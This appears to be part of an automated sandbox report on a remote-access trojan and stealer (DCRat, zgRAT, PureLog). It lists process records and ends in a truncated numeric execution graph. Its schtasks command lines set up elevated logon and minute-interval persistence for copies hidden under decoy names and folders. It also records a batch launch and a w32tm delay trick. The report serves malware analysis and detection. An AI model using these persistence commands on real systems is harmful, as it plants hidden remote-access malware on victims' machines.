                                                                                                                  Has exited:true

                                                                                                                  Target ID:7
                                                                                                                  Start time:09:02:01
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNM" /sc ONLOGON /tr "'C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:8
                                                                                                                  Start time:09:02:01
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 6 /tr "'C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:9
                                                                                                                  Start time:09:02:01
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 8 /tr "'C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exe'" /f
                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:10
                                                                                                                  Start time:09:02:01
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNM" /sc ONLOGON /tr "'C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:11
                                                                                                                  Start time:09:02:01
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 5 /tr "'C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:12
                                                                                                                  Start time:09:02:02
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 9 /tr "'C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exe'" /f
                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:13
                                                                                                                  Start time:09:02:02
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNM" /sc ONLOGON /tr "'C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:14
                                                                                                                  Start time:09:02:02
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 11 /tr "'C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:15
                                                                                                                  Start time:09:02:02
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe'" /f
                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:16
                                                                                                                  Start time:09:02:02
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNM" /sc ONLOGON /tr "'C:\Program Files (x86)\java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:17
                                                                                                                  Start time:09:02:03
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:18
                                                                                                                  Start time:09:02:03
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /f
                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:19
                                                                                                                  Start time:09:02:03
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:20
                                                                                                                  Start time:09:02:03
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:21
                                                                                                                  Start time:09:02:03
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "AgentcomponentbrokermonitordhcpA" /sc MINUTE /mo 14 /tr "'C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe'" /f
                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:22
                                                                                                                  Start time:09:02:03
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "Agentcomponentbrokermonitordhcp" /sc ONLOGON /tr "'C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:23
                                                                                                                  Start time:09:02:03
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "AgentcomponentbrokermonitordhcpA" /sc MINUTE /mo 11 /tr "'C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:24
                                                                                                                  Start time:09:02:03
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\IwAYZ2SgOs.bat"
                                                                                                                  Imagebase:0x7ff71b740000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:25
                                                                                                                  Start time:09:02:03
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:26
                                                                                                                  Start time:09:02:03
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                                                                                                  Imagebase:0x6c0000
                                                                                                                  File size:1'914'880 bytes
                                                                                                                  MD5 hash:86AF92730370230540800E6D509E4155
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:27
                                                                                                                  Start time:09:02:03
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                                                                                                  Imagebase:0xb70000
                                                                                                                  File size:1'914'880 bytes
                                                                                                                  MD5 hash:86AF92730370230540800E6D509E4155
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:28
                                                                                                                  Start time:09:02:03
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\chcp.com
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:chcp 65001
                                                                                                                  Imagebase:0x7ff721f20000
                                                                                                                  File size:14'848 bytes
                                                                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:29
                                                                                                                  Start time:09:02:03
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Program Files (x86)\java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe"
                                                                                                                  Imagebase:0x3e0000
                                                                                                                  File size:1'914'880 bytes
                                                                                                                  MD5 hash:86AF92730370230540800E6D509E4155
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe, Author: Joe Security
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 71%, ReversingLabs
                                                                                                                  Has exited:true

                                                                                                                  Target ID:30
                                                                                                                  Start time:09:02:03
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\w32tm.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                  Imagebase:0x7ff6d6c80000
                                                                                                                  File size:108'032 bytes
                                                                                                                  MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:31
                                                                                                                  Start time:09:02:03
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Program Files (x86)\java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe"
                                                                                                                  Imagebase:0x690000
                                                                                                                  File size:1'914'880 bytes
                                                                                                                  MD5 hash:86AF92730370230540800E6D509E4155
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001F.00000002.4141584721.0000000003008000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001F.00000002.4141584721.00000000031DE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001F.00000002.4141584721.0000000002BF7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Has exited:false

                                                                                                                  Target ID:34
                                                                                                                  Start time:09:02:08
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe"
                                                                                                                  Imagebase:0x70000
                                                                                                                  File size:1'914'880 bytes
                                                                                                                  MD5 hash:86AF92730370230540800E6D509E4155
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 71%, ReversingLabs
                                                                                                                  Has exited:true

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:9.7%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:9.3%
                                                                                                                    Total number of Nodes:1507
                                                                                                                    Total number of Limit Nodes:46
58d051 82 API calls 24335 58885d 24334->24335 24335->24327 24335->24334 24337 58898b 24335->24337 24341 588992 24335->24341 24610 588117 84 API calls 24335->24610 24611 582021 74 API calls 24335->24611 24595 587c0d 24336->24595 24612 582021 74 API calls 24337->24612 24338 588a5f 24342 588ab6 24338->24342 24355 588a6a 24338->24355 24341->24338 24343 5889e1 24341->24343 24350 588a4c 24342->24350 24615 587fc0 97 API calls 24342->24615 24347 58a231 3 API calls 24343->24347 24343->24350 24352 588b14 24343->24352 24344 589105 24349 58959a 80 API calls 24344->24349 24345 588ab4 24346 58959a 80 API calls 24345->24346 24346->24327 24351 588a19 24347->24351 24349->24327 24350->24345 24350->24352 24351->24350 24613 5892a3 97 API calls 24351->24613 24352->24344 24364 588b82 24352->24364 24616 5898bc 24352->24616 24353 58ab1a 8 API calls 24356 588bd1 24353->24356 24355->24345 24614 587db2 101 API calls 24355->24614 24359 58ab1a 8 API calls 24356->24359 24373 588be7 24359->24373 24362 588b70 24620 586e98 77 API calls 24362->24620 24364->24353 24365 588cbc 24366 588d18 24365->24366 24367 588e40 24365->24367 24368 588d8a 24366->24368 24369 588d28 24366->24369 24370 588e52 24367->24370 24371 588e66 24367->24371 24390 588d49 24367->24390 24378 588167 19 API calls 24368->24378 24374 588d6e 24369->24374 24382 588d37 24369->24382 24375 589215 123 API calls 24370->24375 24372 593377 75 API calls 24371->24372 24376 588e7f 24372->24376 24373->24365 24377 588c93 24373->24377 24384 58981a 79 API calls 24373->24384 24374->24390 24623 5877b8 111 API calls 24374->24623 24375->24390 24626 593020 123 API calls 24376->24626 24377->24365 24621 589a3c 82 API calls 24377->24621 24381 588dbd 24378->24381 24386 588df5 24381->24386 24387 588de6 24381->24387 24381->24390 24622 582021 74 API calls 24382->24622 24384->24377 24625 589155 93 API calls __EH_prolog 24386->24625 24624 587542 85 API calls 24387->24624 24393 588f85 24390->24393 24627 582021 74 API calls 24390->24627 24392 589090 24392->24344 
24394 58a4ed 3 API calls 24392->24394 24393->24344 24393->24392 24395 58903e 24393->24395 24601 589f09 SetEndOfFile 24393->24601 24396 5890eb 24394->24396 24602 589da2 24395->24602 24396->24344 24628 582021 74 API calls 24396->24628 24399 589085 24401 589620 77 API calls 24399->24401 24401->24392 24402 5890fb 24629 586dcb 76 API calls _wcschr 24402->24629 24405 5816a4 24404->24405 24645 58cee1 24405->24645 24409 589f59 24408->24409 24410 589f63 24409->24410 24653 586d0c 78 API calls 24409->24653 24410->24240 24412->24252 24418 581732 24413->24418 24415 5813d6 24415->24291 24416->24285 24417->24286 24419 581748 24418->24419 24430 5817a0 __InternalCxxFrameHandler 24418->24430 24420 581771 24419->24420 24431 586c36 76 API calls __vswprintf_c_l 24419->24431 24421 5817c7 24420->24421 24427 58178d ___std_exception_copy 24420->24427 24424 5a3e3e 22 API calls 24421->24424 24423 581767 24432 586ca7 75 API calls 24423->24432 24425 5817ce 24424->24425 24425->24430 24434 586ca7 75 API calls 24425->24434 24427->24430 24433 586ca7 75 API calls 24427->24433 24430->24415 24431->24423 24432->24420 24433->24430 24434->24430 24436 58cf4d 24435->24436 24438 58cf54 24435->24438 24437 58981a 79 API calls 24436->24437 24437->24438 24438->24294 24439->24296 24441 59de78 24440->24441 24442 58e617 53 API calls 24441->24442 24443 59de9b 24442->24443 24444 584092 _swprintf 51 API calls 24443->24444 24445 59dead 24444->24445 24446 59d4d4 16 API calls 24445->24446 24447 591b7c 24446->24447 24447->24249 24449 5819bf 24448->24449 24452 5819bb 24448->24452 24453 589e80 79 API calls 24449->24453 24450 5819d4 24454 5818f6 24450->24454 24452->24303 24453->24450 24455 581908 24454->24455 24456 581945 24454->24456 24457 583b2d 101 API calls 24455->24457 24462 583fa3 24456->24462 24460 581928 24457->24460 24460->24452 24466 583fac 24462->24466 24463 583b2d 101 API calls 24463->24466 24464 581966 24464->24460 24467 581e50 24464->24467 24466->24463 24466->24464 24479 590e08 24466->24479 24468 581e5a 
__EH_prolog 24467->24468 24487 583bba 24468->24487 24470 581e84 24471 581732 78 API calls 24470->24471 24478 581f0b 24470->24478 24472 581e9b 24471->24472 24515 5818a9 78 API calls 24472->24515 24474 581eb3 24476 581ebf _wcslen 24474->24476 24516 591b84 MultiByteToWideChar 24474->24516 24517 5818a9 78 API calls 24476->24517 24478->24460 24480 590e0f 24479->24480 24481 590e2a 24480->24481 24485 586c31 RaiseException CallUnexpected 24480->24485 24483 590e3b SetThreadExecutionState 24481->24483 24486 586c31 RaiseException CallUnexpected 24481->24486 24483->24466 24485->24481 24486->24483 24488 583bc4 __EH_prolog 24487->24488 24489 583bda 24488->24489 24490 583bf6 24488->24490 24543 58138b 74 API calls 24489->24543 24491 583e51 24490->24491 24495 583c22 24490->24495 24560 58138b 74 API calls 24491->24560 24494 583be5 24494->24470 24495->24494 24518 593377 24495->24518 24497 583ca3 24499 583d2e 24497->24499 24514 583c9a 24497->24514 24546 58d051 24497->24546 24498 583c9f 24498->24497 24545 5820bd 78 API calls 24498->24545 24528 58ab1a 24499->24528 24501 583c8f 24544 58138b 74 API calls 24501->24544 24502 583c71 24502->24497 24502->24498 24502->24501 24503 583d41 24508 583dd7 24503->24508 24509 583dc7 24503->24509 24552 593020 123 API calls 24508->24552 24532 589215 24509->24532 24512 583dd5 24512->24514 24553 582021 74 API calls 24512->24553 24554 592297 24514->24554 24515->24474 24516->24476 24517->24478 24519 59338c 24518->24519 24521 593396 ___std_exception_copy 24518->24521 24561 586ca7 75 API calls 24519->24561 24522 59341c 24521->24522 24523 5934c6 24521->24523 24527 593440 _abort 24521->24527 24562 5932aa 75 API calls 3 library calls 24522->24562 24563 5a238d RaiseException 24523->24563 24526 5934f2 24527->24502 24529 58ab28 24528->24529 24531 58ab32 24528->24531 24530 59eb38 8 API calls 24529->24530 24530->24531 24531->24503 24533 58921f __EH_prolog 24532->24533 24564 587c64 24533->24564 24536 5813ba 78 API calls 24537 589231 24536->24537 24567 58d114 
24537->24567 24539 58928a 24539->24512 24540 589243 24540->24539 24542 58d114 118 API calls 24540->24542 24576 58d300 97 API calls __InternalCxxFrameHandler 24540->24576 24542->24540 24543->24494 24544->24514 24545->24497 24547 58d072 24546->24547 24548 58d084 24546->24548 24577 58603a 82 API calls 24547->24577 24578 58603a 82 API calls 24548->24578 24551 58d07c 24551->24499 24552->24512 24553->24514 24556 5922a1 24554->24556 24555 5922ba 24579 590eed 86 API calls 24555->24579 24556->24555 24559 5922ce 24556->24559 24558 5922c1 24558->24559 24560->24494 24561->24521 24562->24527 24563->24526 24565 58b146 GetVersionExW 24564->24565 24566 587c69 24565->24566 24566->24536 24573 58d12a __InternalCxxFrameHandler 24567->24573 24568 58d29a 24569 58d2ce 24568->24569 24570 58d0cb 6 API calls 24568->24570 24571 590e08 SetThreadExecutionState RaiseException 24569->24571 24570->24569 24574 58d291 24571->24574 24572 598c8d 103 API calls 24572->24573 24573->24568 24573->24572 24573->24574 24575 58ac05 91 API calls 24573->24575 24574->24540 24575->24573 24576->24540 24577->24551 24578->24551 24579->24558 24580->24313 24581->24313 24582->24310 24584 585d2a 24583->24584 24630 585c4b 24584->24630 24587 585d5d 24588 585d95 24587->24588 24635 58b1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 24587->24635 24588->24328 24590 588186 24589->24590 24591 588232 24590->24591 24642 58be5e 19 API calls __InternalCxxFrameHandler 24590->24642 24641 591fac CharUpperW 24591->24641 24594 58823b 24594->24331 24596 587c22 24595->24596 24597 587c5a 24596->24597 24643 586e7a 74 API calls 24596->24643 24597->24335 24599 587c52 24644 58138b 74 API calls 24599->24644 24601->24395 24603 589db3 24602->24603 24606 589dc2 24602->24606 24604 589db9 FlushFileBuffers 24603->24604 24603->24606 24604->24606 24605 589e3f SetFileTime 24605->24399 24606->24605 24607->24320 24608->24327 24609->24327 24610->24335 24611->24335 24612->24341 24613->24350 24614->24345 24615->24350 24617 588b5a 24616->24617 24618 
